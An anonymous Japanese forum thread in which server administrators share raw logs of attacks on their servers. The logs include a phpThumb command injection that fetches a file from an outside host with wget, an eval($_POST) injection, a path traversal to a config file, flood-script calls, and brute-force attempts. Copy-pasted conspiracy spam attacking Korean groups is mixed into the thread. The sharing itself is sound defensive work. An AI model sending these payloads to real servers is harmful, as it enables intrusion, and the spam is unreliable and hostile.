79.143.179.235 - - [03/Nov/2011:01:00:03 +0900] "GET /webdav/sprint.php?act=phptools&host=90.230.138.205&time=120&port=7171 HTTP/1.1" 200 46 "-" "-" 79.143.179.235 - - [03/Nov/2011:01:09:07 +0900] "GET /webdav/sprint.php?act=phptools&host=83.226.50.111&time=120&port=7171 HTTP/1.1" 200 46 "-" "-" こんなふうにパラメータ変えてアタックしてくる。 もう1週間くらい同じIPからのアタックが続いてるよ、逆引きすると backup01.xsltel.me >103 特定できてるなら、ブロックすりゃ済む話だろ... このスレはそのアタックNo1してきたURIやら状況を書いて みんなに参考にしてもらうための情報共有スレなんですけどね # grep 222.229.65.227 auth.log|head -2 Nov 27 20:27:38 あああ sshd[9857]: Did not receive identification string from 222.229.65.227 Nov 27 20:31:55 あああ sshd[10280]: Failed password for invalid user root from 222.229.65.227 port 35862 ssh2 # grep 222.229.65.227 auth.log|tail -1 Nov 27 21:05:45 あああ sshd[15613]: Failed password for invalid user root from 222.229.65.227 port 43733 ssh2 # grep 222.229.65.227 auth.log|wc 1846 25606 185870 # host iacp-gw.kochi-tech.ac.jp iacp-gw.kochi-tech.ac.jp has address 222.229.65.227 管理者がんがれ〜。 2002の「アルゼンチンvsイングランド」と「決勝」を朝鮮総連を騙し、観戦した少頭劣一族のアミ…立て籠り犯 朝鮮総連 少頭劣一族の真の最終目的は 徳川の財産を全て奪い 日本の芸能人を多数 中国へ拉致し、 あちらで更に監禁し働かせ 自分達家族は優雅に国に土地を買い 自分達の国にし遊んで暮らすつもりだった。 日本の芸能人を色々な奴隷にすると言っていた。日本列島は棄てる。 中国へ帰る家族のみが立て籠り犯だ。 次に狙うのはイタリアだったらしい。 おまぬ〜! フィリピンの范蘭と西太后の所からモンゴルに逃げた『シバ』の子達だ。 同一プロバイダから昨日と今日で3回アタックしてきやがった 114.51.19.152 今、まともなサーバーは Googleのみ。 確認するべき。 Googleで インターネットテレビ 朝鮮総連 少頭劣一族 自民党 立て籠 人質(又はハッキング) を検索して 各方面に連絡お願い致します。 インターネットテレビ 自分の本名 8桁の生年月日 で自分の犯罪も分かるかも。 掟破りのコピペ犯は私です。 犯罪解決の為に 朝鮮人と華喃 少頭劣一族=蔗冽一族と日本中…更にGoogleで御覧の世界中の方々に閲覧して頂いております。 2チャンも私が貼る場所は閲覧して頂いております。 人質は 世界中の国のトップと国連とFreemason 全メンバーですから…日本中愚か者ばかりで嘆かわしい限り。 毎日同一人物だと思われるksからアタックされ続けている 94.23.45.14 - - [20/Dec/2011:11:31:26 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-" 114.51.35.108 - - [20/Dec/2011:12:06:05 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 1.114.107.0 - - [20/Dec/2011:13:58:33 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 1.114.107.0 - - [20/Dec/2011:16:50:56 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 184.173.248.10 - - [20/Dec/2011:18:32:53 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-" 114.51.163.199 - - [20/Dec/2011:19:52:26 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 114.51.163.199 - - [20/Dec/2011:21:46:59 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 207.109.164.19 - - [20/Dec/2011:22:12:50 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-" 114.51.163.199 - - [20/Dec/2011:23:43:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 114.51.185.197 - - [21/Dec/2011:12:19:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 114.51.80.140 - - [21/Dec/2011:14:58:07 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 114.51.80.140 - - [21/Dec/2011:16:51:15 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 1.115.18.174 - - [21/Dec/2011:18:47:47 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 1.115.18.174 - - [21/Dec/2011:20:44:18 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 50.19.21.165 - - [21/Dec/2011:21:33:18 +0900] "HEAD / HTTP/1.0" 403 0 "-" "-" 1.115.18.174 - - [21/Dec/2011:22:37:54 +0900] "GET / HTTP/1.1" 403 169 "-" "Java/1.6.0_23" 国籍調べたらどうもフランスらしいけど、フランスの糞餓鬼かな コロスぞ ゴラァ 91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /cms/plugins/content/jthumbs/includes/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp 91.121.97.130 - - [27/Dec/2011:03:54:06 +0900] "GET /wp-content/plugins/ione-core/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tm 91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /common/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O% 91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19 91.121.97.130 - - [27/Dec/2011:03:54:07 +0900] "GET /libs/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79 91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp; 91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wge 91.121.97.130 - - [27/Dec/2011:03:54:08 +0900] "GET /gallery/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.7 >>115 whois情報だとdedicated serverって書いてあるから、 レンタルサーバか何かだろう。 あとphpThumb()と呼ばれるツールの脆弱性を突いて、 サーバ上でコマンドを実行しようとしているところから すると、おそらく対象のサーバは乗っ取られんではないかな。 IPアドレス 175.105.126.4 ホスト名 4.126.105.175.ap.yournet.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 種別不明 都道府県 大阪府 IPひろば検索ランキング 17位 (48Point) 安藤優子、木村太郎は、某プロパイダの社外取締役、かつ、安藤は、フジ社外の人間にもかかわらず、フジテレビジョンのM&Aの最中、フジのホワイトナ イトの【親会社】の本業を無視して、「インターネットは虚業だ。具体性がない 。」というようなことをコメントしました。この虚業は、livedoorを指していた としても、「同業者」であったということは、非常に、違和感を感じずには、い られません。 78.46.89.6 (liventura-grid.com) 2012/01/08,09:41:21,"-",GET,"/muieblackcat","","1.1",403,3075,"-","","-" 2012/01/08,09:41:22,"-",GET,"//index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:23,"-",GET,"//admin/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:24,"-",GET,"//admin/phpmyadmin/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:24,"-",GET,"//admin/pma/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:25,"-",GET,"//db/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:26,"-",GET,"//dbadmin/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:27,"-",GET,"//myadmin/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:28,"-",GET,"//mysql/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:29,"-",GET,"//mysqladmin/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:30,"-",GET,"//typo3/phpmyadmin/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:31,"-",GET,"//phpadmin/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:32,"-",GET,"//phpMyAdmin/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:33,"-",GET,"//phpmyadmin/index.php","","1.1",403,3075,"-","","-" 2012/01/08,09:41:33,"-",GET,"//phpmyadmin1/index.php","","1.1",403,3075,"-","","-" 以下pma関係を主に百数十回 >>119 セキュリティホールを突いてくるなんてどこのどいつだよ、 と思ったらドイツだった。 久しぶりに来た 184.105.65.228 guardlayer.com - 2012-02-24 10:06:04 GET /muieblackcat HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/pma/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:07 GET //admin/phpmyadmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //db/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //dbadmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //myadmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:08 GET //mysql/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //mysqladmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //typo3/phpmyadmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpadmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:09 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin1/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //phpmyadmin2/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:10 GET //pma/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/phpMyAdmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //xampp/phpmyadmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //web/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:11 GET //php-my-admin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //websql/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpmyadmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:12 GET //phpMyAdmin-2/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //php-my-admin/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.3/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.2.6/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:13 GET //phpMyAdmin-2.5.1/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.4/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc1/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-rc2/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:14 GET //phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc1/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6-rc2/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.6/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:15 GET //phpMyAdmin-2.5.7/index.php HTTP/1.1 404 385 - - 184.105.65.228 guardlayer.com - 2012-02-24 10:06:16 GET //phpMyAdmin-2.5.7-pl1/index.php HTTP/1.1 404 385 - - >>121 うちでも13時と20時頃に同じのが来てるわ 175.194.234.79 - - [26/Feb/2012:14:10:46 +0900] "R\xb7\x95\xda\x87\x9c\xffX\xa1\xb8\x9d\x04g\x9d\xc0\x9c\x96\xde\x1e\xdd\x18\xf6\\\"\x07\xb1\xed\xcb\xe4\xfbT\xa1\xf3\xe8\x82\x9c\x16@\xfe\x1b\xf3+\xb1" 501 335 "-" "-" なにこれ怖い 韓国(´・д・`)ヤダ Googleから大量アクセスの一部 検索用botとはまた違うみたいだ 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+ 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Blackberry8520/5.0.0.822 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (Series40; NokiaC3-00/03.35; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.0.0.10.15 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - SAMSUNG-GT-C3200/1.0 NetFront/3.5 Profile/M IDP-2.0 Configuration/CLDC-1.1 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Opera/9.50 (J2ME/MIDP; Opera Mini/4.0.8462/8; U; en) 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5184 - Nokia6820/2.0 (4.83) Profile/MIDP-1.0 Configuration/CLDC-1.0 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (Linux; U; Android 2.3.3;en-US;GT-I9000 Build/GINGERBREAD) AppleWebKit/525.10+ (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - SoftBank/1.0/920SH/SHJ001 Browser/NetFront/3.4 Profile/MIDP-2.0 Configuration/CLDC-1.1 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - KDDI-CA3A UP.Browser/6.2.0.13.2 (GUI) MMP/2.0 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:41 GET / HTTP/1.0 200 5104 - DoCoMo/2.0 P906i(c100;TB;W24H15) 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+ 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5013 - Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en-US) AppleWebKit/534.8+ (KHTML, like Gecko) Version/6.0.0.570 Mobile Safari/534.8+ 74.125.56.33 74.125.56.33 - 2012-03-02 11:36:42 GET / HTTP/1.0 200 5184 - Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5230/12.0.089; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 70.62.198.26 rrcs-70-62-198-26.central.biz.rr.com しつこい 荒らしやめろ ip:218.218.181.166 host:KYNfb-02p1-166.ppp11.odn.ad.jp UA:Opera/9.80 (Windows NT 6.0; U; ja) Presto/2.10.229 Version/11.61 >126 国内なら相手ISPにログ付きで苦情を送れ。大抵それで方がつく。 甘いところだと注意しただけで大して変わらないこともあるけどね 厳しいところは一発で回線停止されるけど odnはどうだったかな… "217.36.211.177""2012-03-23 00:57:42""ETCSERVER01""""""""""AUTH=EFAIL:TYPE=LOGIN""" "0""host217-36-211-177.in-addr.btopenworld.com" 8000行あった。数秒おきに 16時間・・・ 64.27.15.56 アメリカunassigned.calpop.com メール鯖にアタックしてくる 116.126.87.154 韓国 [Sat May 12 00:47:09 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1 [Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1 [Sat May 12 00:47:10 2012] [error] [client 116.126.87.154] Invalid URI in request GET :81/phpmyadmin/scripts/setup.php HTTP/1.1 他137種類のattack ??? 日本国内からのポートスキャン、クラックツール実行 49.252.168.148 EM49-252-168-148.pool.e-mobile.ne.jp. 217.41.19.142 dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Disconnected (no auth attempts): rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx dovecot: pop3-login: Aborted login (auth failed, 1 attempts): user=<admin>, method=PLAIN, rip=217.41.19.142, lip=xx.xx.xx.xx [error] [client 65.74.155.211] File does not exist: /var/www/html/translators.html [error] [client 65.74.155.211] File does not exist: /var/www/html/phpmyadmin [error] [client 65.74.155.211] File does not exist: /var/www/html/phpMyAdmin [error] [client 65.74.155.211] File does not exist: /var/www/html/pma [error] [client 65.74.155.211] File does not exist: /var/www/html/mysql 日本国内からくる奴は、OCNが多いが理由があるのだろうか? YokozunaNETという謎のISPからDDOS食らった ポート22に侵入しようとしてくる www23111u.sakura.ne.jp www3079uh.sakura.ne.jp www7183ue.sakura.ne.jp www18135ue.sakura.ne.jp ssh(dd_ssh)攻撃 1.33.202.193 el-labo-s1.el-labo.jp このスレまだあるんだね。 ssh対策なら、denyhosts動かしておけば自動収集してくれるのに。 purge_deny=1yにしておいたら、こんなに収集してくれたよ。 % egrep ^sshd /etc/hosts.deny | wc -l 968 218.67.246.197 [2012.8/07-18:53:47 +0900] "POST /index.php/module/action/param1/$%7B@print(eval($_POST%5Bc%5D))%7D HTTP/1.1" 404 REF:- >>141 こいつ馬鹿だわ 期間も書かずに、こんなにとか言ってるし 夏だねぇ。 purge_deny=1y の意味ぐらい調べてから書けば良いのに。 そういう意味じゃないと思われ 夏だな、電波野郎しかいないのか 2012/08/21,03:07:39,122.154.101.54,"","-","-",GET,"/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php","module_name=../../../../../../../..//etc/amportal.conf","1.1",403,1041,"-","","-" 1年でpurgeするのだから、1年分の収集だろうが... ヤレヤレ。 203.91.121.70 毎日一万回以上うちのサーバーにssh総当たりしてくる 何か怖い >>148 そう思ってる奴は他にもいる ttp://ip-address-lookup-v4.com/ip/203.91.121.70 58.183.165.251 違法物をやりとりするサーバーを立てています。 http://awabi.2ch.net/test/read.cgi/download/1347785389/ このスレで ID:SLuCn6vK0 大暴れしている 女子供を晒しアゲ中傷の嵐 >150 違法なら警察へGO! 警察庁:都道府県警察本部のサイバー犯罪相談窓口等一覧 http://www.npa.go.jp/cyber/soudan.htm >>152 こいつら? 12.7.145.50 12.71.117.172 12.238.210.67 24.39.213.154 24.97.64.230 24.103.52.22 24.123.56.246 24.186.3.95 24.234.155.80 50.75.160.114, 63.238.5.66 68.15.108.58 68.16.48.68 65.40.186.170 66.134.197.178 67.52.184.130 67.76.162.45 67.112.239.113 70.43.109.131 70.60.238.70 72.89.191.60 70.255.147.109 108.64.133.67 108.71.19.30 108.162.17.130 173.12.143.130 173.44.136.74 173.162.218.11 173.200.3.25 209.132.232.92 209.166.158.116 216.1.42.19 以上のIPからうちのメールサーバーに数回ずつ短時間に連続して来てた 【一部抜粋】 dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<zaragoza>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<boullosa>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<capurro>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<phernandez>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<lucero>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<moreno>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx dovecot: pop3-login: Disconnected (auth failed, 1 attempts): user=<munoz>, method=PLAIN, rip=41.222.198.59, lip=xx.xxx.xx.xx ユーザ名変えて物凄い勢いで来てた 66.161.176.108 - - [06/Feb/2013:21:06:40 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 226 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:10 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 1001 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:11 +0900] "GET /phpMyAdmin/main.php HTTP/1.0" 404 1001 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /db/main.php HTTP/1.0" 404 1001 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /PMA/main.php HTTP/1.0" 404 1001 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:12 +0900] "GET /pma/main.php HTTP/1.0" 404 1001 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /admin/main.php HTTP/1.0" 404 1001 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /mysql/main.php HTTP/1.0" 404 1001 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:13 +0900] "GET /myadmin/main.php HTTP/1.0" 404 1001 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /phpadmin/main.php HTTP/1.0" 404 1001 "-" "-" 66.161.176.108 - - [06/Feb/2013:21:12:14 +0900] "GET /webadmin/main.php HTTP/1.0" 404 1001 "-" "-" 72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 1001 "-" "ZmEu" 72.51.39.133 - - [07/Feb/2013:20:41:09 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu" 72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu" 72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu" 72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu" 72.51.39.133 - - [07/Feb/2013:20:41:10 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 1001 "-" "ZmEu" 83.238.212.227 - - [06/Feb/2013:18:09:28 +0900] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu" 83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu" 83.238.212.227 - - [06/Feb/2013:18:09:29 +0900] "GET /admin/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu" 83.238.212.227 - - [06/Feb/2013:18:09:30 +0900] "GET /pma/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu" 83.238.212.227 - - [06/Feb/2013:18:09:31 +0900] "GET /mysql/scripts/setup.php HTTP/1.1" 404 1003 "-" "ZmEu" 141.212.121.10 - - [05/Feb/2013:23:42:40 +0900] "\x80w\x01\x03\x01" 501 951 "-" "-" MyAdminなんかねえよ馬鹿 pmaアタックしょっちゅう来るよね うちはディレクトリ名に誕生日入れてるから大丈夫 126.9.120.142 